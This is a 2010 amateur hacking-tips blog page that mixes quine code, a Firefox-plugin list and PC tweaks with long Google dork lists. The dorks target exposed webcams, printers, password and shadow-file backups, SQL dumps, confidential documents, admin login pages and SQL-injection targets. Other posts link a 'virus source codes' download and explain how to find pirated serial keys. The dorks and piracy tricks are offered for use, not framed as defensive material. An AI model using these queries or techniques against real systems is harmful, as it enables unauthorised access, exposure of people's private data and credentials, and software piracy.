Wednesday, September 29, 2010

chatbot example Alicebot

A chatbot (or chatterbot, or chat bot) is a computer program designed to simulate an intelligent conversation with one or more human users via auditory or textual methods. Traditionally, the aim of such simulation has been to fool the user into thinking that the program's output has been produced by a human (the Turing test). Programs playing this role are sometimes referred to as Artificial Conversational Entities, talk bots or chatterboxes. More recently, however, chatbot-like methods have been used for practical purposes such as online help, personalised service, or information acquisition, in which case the program is functioning as a type of conversational agent. What distinguishes a chatbot from more sophisticated natural language processing systems is the simplicity of the algorithms used. Although many chatbots do appear to interpret human input intelligently when generating their responses, many simply scan for keywords within the input and pull a reply with the most matching keywords, or the most similar wording pattern, from a textual database. (or chatterbot, or chat bot) is a computer program designed to simulate an intelligent conversation with one or more human users via auditory or textual methods. Traditionally, the aim of such simulation has been to fool the user into thinking that the program's output has been produced by a human (the Turing test). Programs playing this role are sometimes referred to as Artificial Conversational Entities, talk bots or chatterboxes. More recently, however, chatbot-like methods have been used for practical purposes such as online help, personalised service, or information acquisition, in which case the program is functioning as a type of conversational agent. What distinguishes a chatbot from more sophisticated natural language processing systems is the simplicity of the algorithms used. Although many chatbots do appear to interpret human input intelligently when generating their responses, many simply scan for keywords within the input and pull a reply with the most matching keywords, or the most similar wording pattern, from a textual database.



here is the Alicebot for your service Galaia Project.
visit http://mysamsungstar3g.blogspot.com/
due to bandwidth problem i moved from my blog

hi friends check out new hackers lab experimets

Earth tracking Program By http://hackerslabrotary.blogspot.com


Mapping The Earth Program By http://hackerslabrotary.blogspot.com



at the end of blog...

Tuesday, September 28, 2010

Here’s a 11th Order quine (11 languages) by Yusuke Endoh

# ruby
l=92.chr;eval s="s=s.dump[r=1..-2].gsub(/("+l*4+"){4,}(?!¥")/){|t|'¥"+l*%d+¥"'%(t
.size/2)};5.times{s=s.dump[r]};puts¥"# python¥¥nprint(¥¥¥"# perl¥¥¥¥nprint(¥¥¥¥¥¥
¥"# lua"+l*4+"nprint("+l*7+"¥"(* ocaml *)"+l*8+"nprint_endline"+l*15+"¥"-- haskel
l"+l*16+"nimport Data.List;import Data.Bits;import Data.Char;main=putStrLn("+l*31
+"¥"/* C */"+l*32+"n#include"+l*32+"nint main(void){char*s[501]={"+l*31+
"¥"++intercalate"+l*31+"¥","+l*31+"¥"(c(tail(init(show("+l*31+"¥"/* Java */"+l*32
+"npublic class QuineRelay{public static void main(String[]a){String[]s={"+l*31+"
¥"++intercalate"+l*31+"¥","+l*31+"¥"(c("+l*31+"¥"brainfuck"+l*64+"n++++++++[>++++
<-]+++++++++>>++++++++++"+l*31+"¥"++(concat(snd(mapAccumL h 2("+l*31+"¥"110"+l*31
+"¥"++g(length s)++"+l*31+"¥"22111211100111112021111102011112120012"+l*31+"¥"++co
ncatMap("+l*32+"c->let d=ord c in if d<11then"+l*31+"¥"21002"+l*31+"¥"else"+l*31+
"¥"111"+l*31+"¥"++g d++"+l*31+"¥"22102"+l*31+"¥")s++"+l*31+"¥"2100211101012021122
2211211101000120211021120221102111000110120211202"+l*31+"¥"))))))++"+l*31+"¥","+l
*63+"¥""+l*64+"n"+l*63+"¥"};int i=0;for(;i<94;i++)System.out.print(s[i]);}}"+l*31
+"¥")))))++"+l*31+"¥",0};int i=0;for(;s[i];i++)printf("+l*63+"¥"%s"+l*63+"¥",s[i]
);puts("+l*63+"¥""+l*63+"¥");return 0;}"+l*31+"¥");c s=map("+l*32+"s->"+l*31+"¥""
+l*63+"¥""+l*31+"¥"++s++"+l*31+"¥""+l*63+"¥""+l*31+"¥")(unfoldr t s);t[]=Nothing;
t s=Just(splitAt(if length s>w&&s!!w=='"+l*31+"¥"'then 501else w)s);w=500;f 0=Not
hing;f x=Just((if x`mod`2>0then '0'else '1'),x`div`2);g x= reverse (unfoldr f x);
h p c=let d=ord c-48in(d,replicate(abs(p-d))(if d

<'else '>')++"+l*31+"¥" ."+l*31+"¥");s="+l*31+"¥"# ruby"+l*32+"n"+l*31+"¥"++"+l*31+"¥"l=92.chr;eval s=¥"+ (z=l*31)+¥"¥¥¥"¥"+s+z+¥"¥¥¥""+l*31+"¥"++"+l*31+"¥""+l*32+"n"+l*31+"¥""+l*15+"¥""+ l*7+"¥")"+l*4+"n¥¥¥¥¥¥¥")¥¥¥")¥"########### (c) Yusuke Endoh, 2009 ###########¥n"
The Ruby code above generates Python code, which generates Perl code, which generates Lua code, which generates OCamlcode, which generates Haskell code, which generates C code, which generates Java code, which generates Brainfuck code, which generates Whitespace code, which generates Unlambda code, which generates the original Ruby code again.
more such crazy stuff at International Obfuscated C Code Contest (IOCCC)
Conway’s Game of Life in one line of APL

To properly try this, you’ll require the following versions of each compiler:
* ruby 1.8.7-p72
* Python 2.5.2
* perl v5.10.0
* Lua 5.0.3
* OCaml 3.10.2
* ghc-6.8.2
* gcc 4.3.2
* java "1.5.0_17"
* beef 0.0.6-2
* whitespace 0.3-2
* unlambda 2.0.0-5
Credit goes to Yusuke Endoh for this masterpiece of programming art.

A Quine is a computer program which produces a copy of its own source code as its only output.

A Quine is a computer program which produces a copy of its own source code as its only output.
1 main() { char *s="main() { char *s=%c%s%c; printf(s,34,s,34); }"; printf(s,34,s,34); }

Cryptic quote c++ code

Cryptic quote c++ code
1 double m[]= {7709179928849219.0, 771};int main(){m[1]--?m[0]*=2,main():printf(m);}
This cryptic code when run outputs “C++ sucks

dork for locating network devices

“Copyright (c) Tektronix, Inc.” “printer status”

PhaserLink printers

inurl:”printer/main.html” intext:”settings”

Brother HL printers

intitle:”Dell Laser Printer” ews

Dell printers with EWS technology

intext:centreware inurl:status

Xerox Phaser 4500/6250/8200/8400 printers

inurl:hp/device/this.LCDispatcher

HP printers

intitle:liveapplet inurl:LvAppl

Canon Webview webcams

intitle:”EvoCam” inurl:”webcam.html”

Evocam webcams

inurl:”ViewerFrame?Mode=”


Panasonic Network Camera webcams

(intext:”MOBOTIX M1″ | intext:”MOBOTIX M10″) intext:”Open Menu” Shift-Reload

Mobotix webcams

inurl:indexFrame.shtml Axis

Axis webcams

intitle:”my webcamXP server!” inurl:”:8080″

webcams accessible via WebcamXP Server

allintitle:Brains, Corp.

camera webcams accessible via mmEye

intitle:”active webcam page”

USB webcams

Searching for personal data and confidential documents

Searching for personal data and confidential documents

filetype:xls inurl:”email.xls”

email.xls files, potentially containing contact information

“phone * * *” “address *” “e-mail” intitle: “curriculum vitae”

CVs

“not for distribution”


confidential documents containing the confidential clause

buddylist.blt

AIM contacts list

intitle:index.of mystuff.xml

Trillian IM contacts list

filetype:ctt “msn”

MSN contacts list

filetype:QDF


QDF database files for the Quicken financial application

intitle:index.of finances.xls

finances.xls files, potentially containing information on bank accounts, financial summaries and credit card numbers

intitle:”Index Of” -inurl:maillog maillog size

maillog files, potentially containing e-mail

Network Vulnerability Assessment Report”
“Host Vulnerability Summary Report”
filetype:pdf “Assessment Report”
“This file was generated by Nessus”

reports for network security scans, penetration tests etc

Dork for locating passwords

Dork for locating passwords

http://*:*@www” site

passwords for site, stored as the string “http://username:password@www…”

filetype:bak inurl:”htaccess|passwd|shadow|ht users”

file backups, potentially containing user names and passwords

filetype:mdb inurl:”account|users|admin|admin istrators|passwd|password”

mdb files, potentially containing password information

intitle:”Index of” pwd.db

pwd.db files, potentially containing user names and encrypted passwords

inurl:admin inurl:backup intitle:index.of

directories whose names contain the words admin and backup

“Index of/” “Parent Directory” “WS _ FTP.ini”

filetype:ini WS _ FTP PWD

WS_FTP configuration files, potentially containing FTP server access passwords

ext:pwd inurl:(service|authors|administrators |users) “# -FrontPage-”

files containing Microsoft FrontPage passwords

filetype:sql (“passwd values ****” | “password values ****” | “pass values ****” )

files containing SQL code and passwords inserted into a database

intitle:index.of trillian.ini

configuration files for the Trillian IM

eggdrop filetype:user

user configuration files for the Eggdrop ircbot

filetype:conf slapd.conf

configuration files for OpenLDAP

inurl:”wvdial.conf” intext:”password”

configuration files for WV Dial

ext:ini eudora.ini

configuration files for the Eudora mail client

filetype:mdb inurl:users.mdb

Microsoft Access files, potentially containing user account information

Error message queries

Error message queries

“A syntax error has occurred”filetype:ihtml

Informix database errors, potentially containing function names, filenames, file structure information, pieces of SQL code and passwords

“Access denied for user” “Using password”

authorisation errors, potentially containing user names, function names, file structure information and pieces of SQL code

“The script whose uid is ” “is not allowed to access”

access-related PHP errors, potentially containing filenames, function names and file structure information

“ORA-00921: unexpected end of SQL command”

Oracle database errors, potentially containing filenames, function names and file structure information

“error found handling the request” cocoon filetype:xml

Cocoon errors, potentially containing Cocoon version information, filenames, function names and file structure information

“Invision Power Board Database Error”


Invision Power Board bulletin board errors, potentially containing function names, filenames, file structure information and piece of SQL code

“Warning: mysql _ query()” “invalid query”

MySQL database errors, potentially containing user names, function names, filenames and file structure information

“Error Message : Error loading required libraries.”


CGI script errors, potentially containing information about operating system and program versions, user names, filenames and file structure information

“#mysql dump” filetype:sql

MySQL database errors, potentially containing information about database structure and contents

dork for finding admin page

dork for finding admin page

admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
adm/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp

Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/

sql injection dorks

sql injection dorks
allinurl: \”index php go buy\”
allinurl: \”index.php?go=sell\”
allinurl: \”index php go linkdir\”
allinurl: \”index.php?go=resource_center\”
allinurl: \”resource_center.html\”
allinurl: \”index.php?go=properties\”
allinurl: \”index.php?go=register\”

google Querying for application-generated system reports

Querying for application-generated system reports

“Generated by phpSystem”

operating system type and version, hardware configuration, logged users, open connections, free memory and disk space, mount points

“This summary was generated by wwwstat”
web server statistics, system file structure
“These statistics were produced by getstats”
web server statistics, system file structure
“This report was generated by WebLog”
web server statistics, system file structure
intext:”Tobias Oetiker” “traffic analysis”
system performance statistics as MRTG charts, network configuration
intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
server version, operating system type, child process list, current connections
intitle:”ASP Stats Generator *.*” “ASP Stats Generator” “2003-2004 weppos”
web server activity, lots of visitor information
intitle:”Multimon UPS status page”
UPS device performance statistics
intitle:”statistics of” “advanced web statistics”
web server statistics, visitor information
intitle:”System Statistics” +”System and Network Information Center”

system performance statistics as MRTG charts, hardware configuration, running services

intitle:”Usage Statistics for” “Generated by Webalizer”
web server statistics, visitor information, system file structure
intitle:”Web Server Statistics for ****”
web server statistics, visitor information
nurl:”/axs/ax-admin.pl” -script
web server statistics, visitor information
inurl:”/cricket/grapher.cgi”
MRTG charts of network interface performance
inurl:server-info “Apache Server Information”
web server version and configuration, operating system type, system file structure
“Output produced by SysWatch *”
operating system type and version, logged users, free memory and disk space, mount points, running processes, system logs

Querying for application-generated system reports

Querying for application-generated system reports

“Generated by phpSystem”

operating system type and version, hardware configuration, logged users, open connections, free memory and disk space, mount points

“This summary was generated by wwwstat”
web server statistics, system file structure
“These statistics were produced by getstats”
web server statistics, system file structure
“This report was generated by WebLog”
web server statistics, system file structure
intext:”Tobias Oetiker” “traffic analysis”
system performance statistics as MRTG charts, network configuration
intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
server version, operating system type, child process list, current connections
intitle:”ASP Stats Generator *.*” “ASP Stats Generator” “2003-2004 weppos”
web server activity, lots of visitor information
intitle:”Multimon UPS status page”
UPS device performance statistics
intitle:”statistics of” “advanced web statistics”
web server statistics, visitor information
intitle:”System Statistics” +”System and Network Information Center”

system performance statistics as MRTG charts, hardware configuration, running services

intitle:”Usage Statistics for” “Generated by Webalizer”
web server statistics, visitor information, system file structure
intitle:”Web Server Statistics for ****”
web server statistics, visitor information
nurl:”/axs/ax-admin.pl” -script
web server statistics, visitor information
inurl:”/cricket/grapher.cgi”
MRTG charts of network interface performance
inurl:server-info “Apache Server Information”
web server version and configuration, operating system type, system file structure
“Output produced by SysWatch *”
operating system type and version, logged users, free memory and disk space, mount points, running processes, system logs

Queries for discovering standard post-installation

Queries for discovering standard post-installation

intitle:”Test Page for Apache Installation” “You are free”
Apache 1.2.6
intitle:”Test Page for Apache Installation” “It worked!” “this Web site!”
Apache 1.3.0 – 1.3.9
intitle:”Test Page for Apache Installation” “Seeing this instead”
Apache 1.3.11 – 1.3.33, 2.0
intitle:”Test Page for the SSL/TLS-aware Apache Installation” “Hey, it worked!”
Apache SSL/TLS
intitle:”Test Page for the Apache Web Server on Red Hat Linux”
Apache on Red Hat
intitle:”Test Page for the Apache Http Server on Fedora Core”
Apache on Fedora
intitle:”Welcome to Your New Home Page!”
Debian Apache on Debian
intitle:”Welcome to IIS 4.0!”
IIS 4.0
intitle:”Welcome to Windows 2000 Internet Services”
IIS 5.0

intitle:”Welcome to Windows XP Server Internet Services”
IIS 6.0

Google queries for locating various Web servers

Google queries for locating various Web servers

“Apache/1.3.28 Server at” intitle:index.of
Apache 1.3.28
“Apache/2.0 Server at” intitle:index.of
Apache 2.0
“Apache/* Server at” intitle:index.of
any version of Apache
“Microsoft-IIS/4.0 Server at” intitle:index.of
Microsoft Internet Information Services 4.0
“Microsoft-IIS/5.0 Server at” intitle:index.of
Microsoft Internet Information Services 5.0
“Microsoft-IIS/6.0 Server at” intitle:index.of
Microsoft Internet Information Services 6.0
“Microsoft-IIS/* Server at” intitle:index.of
any version of Microsoft Internet Information Services
“Oracle HTTP Server/* Server at” intitle:index.of

any version of Oracle HTTP Server
“IBM _ HTTP _ Server/* * Server at” intitle:index.of
any version of IBM HTTP Server
“Netscape/* Server at” intitle:index.of
any version of Netscape Server
“Red Hat Secure/*” intitle:index.of
any version of the Red Hat Secure server
“HP Apache-based Web Server/*” intitle:index.of
any version of the HP server

hi friends check out new hackers sphere

hi friends we are no less than google
check out my hacker sphere
at
http://moneyguru.clanteam.com/hp/hackers%20Sphere.htm

Comment if you like it.............................

New Orkut – Upload Images/Songs/Videos in Profile

New Orkut! The latest Buzz in the E-World. But now almost all have it. And its still fresh. Owing to the fact that its like Windows Vista compared to XP. [A huge copy of something else, but who cares as long as it looks good on your screen]. Well I am not here to write about the various new features and how it is different from old Orkut. But basic stuff which will help you make your profile more attractive.
For starters, if you don’t have the new Orkut yet, there are 2 ways to get it.
è Join the official New Orkut community [http://www.orkut.co.in/Main#Community?cmm=95114051
è Ask any of your friends to send you a invite
Ok, with the basic requirements fulfilled, lets get to some serious matter. Today I will be posting methods for 3 things basically
[1] To insert a Image in your about me
[2] To insert a song in your profile
[3] To insert a Video in your profile
First of all, switch to new Orkut
How to insert a pic in about me


Just copy-paste the pic using cntrl + a, cntrl + c, cntrl + v  into your about me
OR
Else upload your own pic to some site, right click on it, select copy image location
Paste it in your  about me, keep in mind to keep it free of any other tags, it should not be inside some italics, or color or some other tags, else it might not work properly


]
How to put a song in your profile
Follow the below steps exactly
Select the code of a available song from www.123orkut.com or www.orkutfunda.com
Open your scrapbook
Click on HTML once
Paste the code
Edit it to make favorable changes, like delete the gif image, the anchor tag for the site etc
To make the player invisible, set height n width as 0
Click on HTML once again
Now you must hear ur song playin with nothing on ur scrapbook
Select whatever is on ur typing region using cntrl + a, copy it n paste it in ur about me somewhere on top, (here too it should be free of all other tags)
Click Save
If you want to upload your own song in your profile :
Upload your song to any website,
Copy the link of your song’s location (URL)
<* embed src=”http://www.mp3orkut.com/wp-content/plugins/xspf_player/xspf_player_slim.swf” flashvars=”&song_url=”UR mp3 URL “&autoplay=true” width=”1″ height=”1″ *>

remove *




How to add a Video in ur Profile
Go to Youtube
Select the Video you want to put on ur profile
Copy the embed code
Switch back to older version
Paste the code
Click preview
Copy the Whole video thumbnail
Paste it in your about me
Save
Also you can apply the above method of clicking HTML twice J
Pls leave any doubts or suggestions here if you find any.

hi friends check out new hackers sphere technology

hi friends we are no less than Google
check out my hacker sphere
at

http://moneyguru.clanteam.com/hp/hackers%20Sphere.htm


check out you will love this experiment....

detect browesr type and redirect the page

A browser detection script can check for browser types, browser versions, available plug-ins, languages, and platforms. Depending on the purpose, you can have the script write a message to your visitors, notify them about plug-ins required for the site, or automatically redirect visitors to a different Web page.

The first step is to decide which browsers you need to check for. While Netscape and Explorer are the most obvious choices, you should at least consider checking for WebTV if your site is designed to appeal to the consumer audience. While WebTV only has 2 million subscribers at this writing, half of them have purchased online.

The JavaScript code in this example queries the "navigator" object, which contains information about which browser and browser version your visitors are using to view your site. This simple detection script will identify the application name (appName) in use and display an alert box.



Friday, September 24, 2010

virus code with study manual

hello friends i have uploaded my virus source codes along with self made study manual i hope this will be helpful for you  to study virus technology..........

download from here
http://rapidshare.com/files/421038295/virus_codes.rar |


And don't worry these viruses are not harmful but teamed 
i recommend you please read the manual before playing with those...  

Wednesday, September 22, 2010

create your business website ,hacking website,or website for earning money

Hi friends
use
co.cc domain
     

its totally free for one year

you can earn money with that.

my website is:-

i am earning good money from it .

CREATE YOUR WEBSITE NOW.



Tools for Analyzing Viruses (With Download)

There are many viruses spread rapidly in the days, therefore many Antivirus vendor like Kapersky, McAfee, Norton and others are compete to create an antivirus which more powerful and secure.The making of Antivirus itself will not separated from the virus itself. We must analyze how it works, what it is capable of doing by the virus, what will infected by the virus. To do an analysis of a virus usually requires tools that can analyze a virus in details and quick.

Here are some tools you can use to analyze a virus:

1. Malcode Analysis Pack

(http://labs.idefense.com/software/download/?downloadID=8)

This tool consists of a variety of applications that can help you analyze a malcode.
For example, such as ShellExt, socketTool, fakeDNS, Sheilcode2Exe and so forth


.
2. Autoruns For Windows
(http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx)

This application is used to determine the location of auto-starting of the startup monitor which is located in the windows.
This application will show the program which is running while the system booting up or logon.




3. RegMon for Windows

(http://technet.microsoft.com/en-us/sysinternals/bb896652.aspx)

This tool can display the applications which are accessing to your system registry.
All will be displayed in real-time



4. Filemon for Windows

(http://technet.microsoft.com/en-us/sysinternals/bb896642.aspx)

This tool will display the system activity of a file in the operating system in real-time.


5. Multipot

(http://labs.idefense.com/software/download/?downloadID=9)

This application is designed to collect a lot of malicious code found on the internet.


6. Process Explorer for Windows

(http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx)

This tool handles information about the process dal DLLs that are currently open.
This application shows the list of processes that are active at that time.


7. Resource Hacker

(http://www.angusj.com/resourcehacker/)

Tool that can be used to change the resource on the Win32 executables and the other resource files.


8. Rootkit Unhooker

(http://www.antirootkit.com/software/RootKit-Unhooker.htm)

Application to detect the rootkit.
Some of the features which where offered are Ultimate Drivers Detection, Hidden Files Detection and so on.


9. SysAnalyzer

(http://labs.idefense.com/software/download/?downloadID=15)

This tool is able to analyze malcode automatically run time to monitor what is being done by the system and the process which is running.


10. PE Identifier

(http://www.peid.info/)

This application is used to detect the packers, cryptors.
This tool is able to detect more than 600 signatures from a different PE file.


11. VB Decompiler Lite

(http://www.vb-decompiler.org/download.htm)

A decompiler for programs which have extension like EXE, DLL and OCX.


12. MiTec EXE Explorer

(http://www.mitec.cz/exe.html)

This tool made as an executable reader.
This application is able to read and displays executable file properties and structure of a file which are analyzed.

I collect This information from some other source sites,Please test the above tools and post a responce ,below in comments.
Thankyou,

How to Find any Serial Key/Crack for Any Software ?

i am going to explain you that how you can "Find any Serial Key for Any Software".I assume that most of you use pirated software. Not everyone can afford buying a program like Photoshop, which costs $699. In this case you can use alternative, free software or you can download a pirated, cracked version of the program. There is a vast number of websites out there, where you can find serial numbers and cracks for any program, but most of them aren't safe to use. Actually most of them are spam sites that “bombard” you with full-screen popup ads, or commandeer your computer into a spam-loving Kraken or Srizbi Botnet army. In this post I will show you the most efficient way of downloading cracks and serial numbers without any risk to your pc.
This is the part of Hacking/Cracking using "Google hacking"

Google Hacking : I will explain google hacking in details in next article very soon.But for now its enough to know that,Google hacking means..how you can search all desired information in direct way,using some google searching tricks.

Now in this article i am going to explain all possible ways to Find the serial Key
a.) Using Google
b.) Using Craagle Software
c.) Using serials search websites.

1.) Finding Serial Key using Google :
To Get the serial number from googleyou have to just follow these steps :


* Go to Google.

* In the search field type : "Software name" 94FBR

* Where, "Software Name" is the name of the item you want to find the serial number for.

* And in google search Results you will get the list of all those websites where the serial key of the required software is available.Thats it !! :-)

HOW DOES THIS WORK ?

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things.
1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for.
2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

See these example searches :
Search the following Keywords on Google :-

"Photoshop 7" 94FBR
"Age of Mythology" 94FBR
"Nero Burning Rom 5.5" 94FBR


Hope you will have no more problems searching for cracks and serial numbers

Fast and Secure browsing using Google Public/Other DNS

How to "Fast and Secure browsing using Google Public/Other DNS".This will really increase your browsing speed.Try this now..
Google Public DNS is a free, global Domain Name System (DNS) resolution service, that you can use as an alternative to your current DNS provider.Here below I m going to show you that where to enter n save these DNS ip adresses.


Steps :
Go to "Start" >> Control Panel >> Network and Internet connections >> Select "Network Connections"
Do right click on "LAN" and go to "Properties" >> double click "(tcp/ip)"
A wildow will popup as show in picture below....



 Configure your network settings to use the IP addresses ..
Free Public DNS Server
Service provider: Google
•    8.8.8.8
•    8.8.4.4
Service provider: ScrubIt
Public dns server address:
•    67.138.54.100
•    207.225.209.66
Service provider:dnsadvantage
Dnsadvantage free dns server list:
•    156.154.70.1
•    156.154.71.1
Service provider:OpenDNS
OpenDNS free dns server list:
•    208.67.222.222
•    208.67.220.220
Service provider: vnsc-pri.sys.gtei.net
Public Name server IP address:
•    4.2.2.1
•    4.2.2.2
•    4.2.2.3
•    4.2.2.4
•    4.2.2.5
•    4.2.2.6



Why should you try custom DNS ?

Speed up your browsing experience.
As web pages become more complex, referencing resources from numerous domains, DNS lookups can become a significant bottleneck in the browsing experience. Whenever a client needs to query a DNS resolver over the network, the latency introduced can be significant, depending on the proximity and number of nameservers the resolver has to query.

Improve your security.
Because of the open, distributed design of the Domain Name System, and its use of the User Datagram Protocol (UDP), DNS is vulnerable to various forms of attack. Public or “open” recursive DNS resolvers are especially at risk, since they do not restrict incoming packets to a set of allowable source IP addresses.

Google DNS Disadvantage
There are many complaint that site are not getting resolved using google DNS.For this you can use multiple Dns

By pass All Disadvantages
On the above window you have "Advance" option ,click it >> go to 2nd tab "DNS" add all above DNS IP's.








 

So,Now Enjoy the Browser speed

How to prevent VBS Virus

What’s VBS Virus ?
It’s a Visual Basic Script Virus that can be programmed by a simple program as a Notepad, however it can make a serious damage to your Computer. Now, you should read the following instruction to prevent those virus. It’s a simple tips to learn.


1. Open Window Explorer, go to the Tools at the toolbar. Select Folder Options.



2. Click on File Types tab menu, scroll down your mouse to find out “vbs” extension file. Then Select the VBS extension





3. You need to change the default program of its extension. Click “Change”.







4. You will see that the Windows will recommend Microsoft Windows Based Script Host to open the VBS file, you should change to Notepad as a default, just scroll down your mouse and you will found the Notepad, select it and Click OK to apply.

After the above steps, each time you open the VBS file, the script which was writen in the VBS file will not be executed by Windows, but it will be opened through a Notepad, so that the virus will not run as well.
If you feel you do not need the VBS extension on your Computer, you can delete the extension from step 3, so you do not need to change it, but you should delete it.
Thats a very common ,simple but effective trick for being safe from bad vb viruses... Please do comment

Monday, September 20, 2010

shutdown and restart in no time !!!

i got a batch prgramm for u ppl who want to shut down their pc and restart in no time no matter how many applications thy r running


start>run>cmd......... dos shell will open

now type this commnad

shutdown -r -f -t00>shutdown.bat

this will creat a system .bat file in administratof folder just double click it and here u go restart of pc in no time at all ........... remove -r command and shutdown will happen withour following restart ......

this is simple and basic trick u can play with windows ....!!!!

Auto End Tasks to Enable a Proper Shutdown

This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.


1. Copy the following (everything in the box) into notepad.


QUOTE
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"ClearPageFileAtShutdown"=dword:00000001

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"AutoEndTasks"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
"WaitToKillServiceTimeout"="1000"


2. Save the file as shutdown.reg
3. Double click the file to import into your registry.

NOTE: If your anti-virus software warns you of a "malicious" script, this is normal if you have "Script Safe" or similar technology enabled.

12 Essential Firefox Plugins for Hacker

1.) XSS Me

This plugin discovers all the fields on the current page, and gives you the option to launch targeted attacks on each field, or to launch all of its attacks against all fields

https://addons.mozilla.org/en-US/firefox/addon/7598/



2.) SQL Inject Me

From the same group as XSS Me, this plugin finds all fields on the page you’re on and let’s you launch the most common SQL injection attacks against them.


https://addons.mozilla.org/en-US/firefox/addon/7597/

3.) Live HTTP Headers

See exactly what your browser is sending and receiving in real-time.

https://addons.mozilla.org/en-US/firefox/addon/3829/


4.) User Agent Switcher

Change your user-agent on the fly. So, you can make it look like you’re coming from Lynx running on AIX, or like you’re the GoogleBot.
https://addons.mozilla.org/en-US/firefox/addon/59



5.) Web Developer

Modify all sorts of options related to the site you’re viewing. Disable scripting, modify forms, etc., etc. Trust me–good stuff.
https://addons.mozilla.org/en-US/firefox/addon/60

6.) Tamper Data
Lets you view the data that’s being passed back and forth between you and the web server…and let’s you mess with it. Think “WebScarab”, but far simpler, and as a Firefox plugin
https://addons.mozilla.org/en-US/firefox/addon/966


7.) ASnumber
Find the Autonomous System Number (ASN) of the network that your current site is served from. Simple. Useful
https://addons.mozilla.org/en-US/firefox/addon/2072/


8.) DT Whois
Do a domaintools.com lookup of the site you’re currently visiting. If you haven’t used domaintools.com yet, you’ll be even more impressed
https://addons.mozilla.org/en-US/firefox/addon/2855


9.) Firebug
Gives you a developer’s view into the page you’re viewing, showing exactly what scripts are running, what the stylesheet is, etc. Oh, and let’s you change them and see what the result would be. Not really a security thing, but strong enough to be included in a list of musts.
https://addons.mozilla.org/en-US/firefox/addon/1843


10.) SwitchProxy Tool
Allows you to quickly switch back and forth between multiple proxies, or between using your main proxy and going straight out to the Internet. My configuration always includes at least one proxy: localhost:8008 for WebScarab.
https://addons.mozilla.org/en-US/firefox/addon/125


11.) Hackbar
This tool, added on Zach’s (@quine’s) request, is kind of interesting. It allows a lot of functionality from a very simple interface. Essentially, it presents you with the ability to modify the current URL in a number of interesting ways, including giving access to a number of simple tools for translating data formats. Worth adding to the list of essentials.
https://addons.mozilla.org/en-US/firefox/addon/3899/


12)auto page refresh
Reloads web pages every so many seconds or minutes. The function is accessible via the context menu (menu you get when you right click on a web page) or via a drop down menu on the reload button ...
https://addons.mozilla.org/en-US/firefox/addon/115/

reset bios password via sotware

CMOS De-Animator v2
CMOS De-Animator v2 is a service utility for your system's CMOS RAM. Unlike its predecessor, the CMOS De-Animator 1.0, the new version includes a graphical interface and CMOS-backup options along with the "Clear CMOS" procedure, which was the original version's only purpose. So, you can now backup the main CMOS settings to a file, or restore them later. The application supports all 32-bit and 64-bit Windows operating systems except Windows 95 and Windows NT 3.51; for these old systems, you have to use De-Animator's previous version.

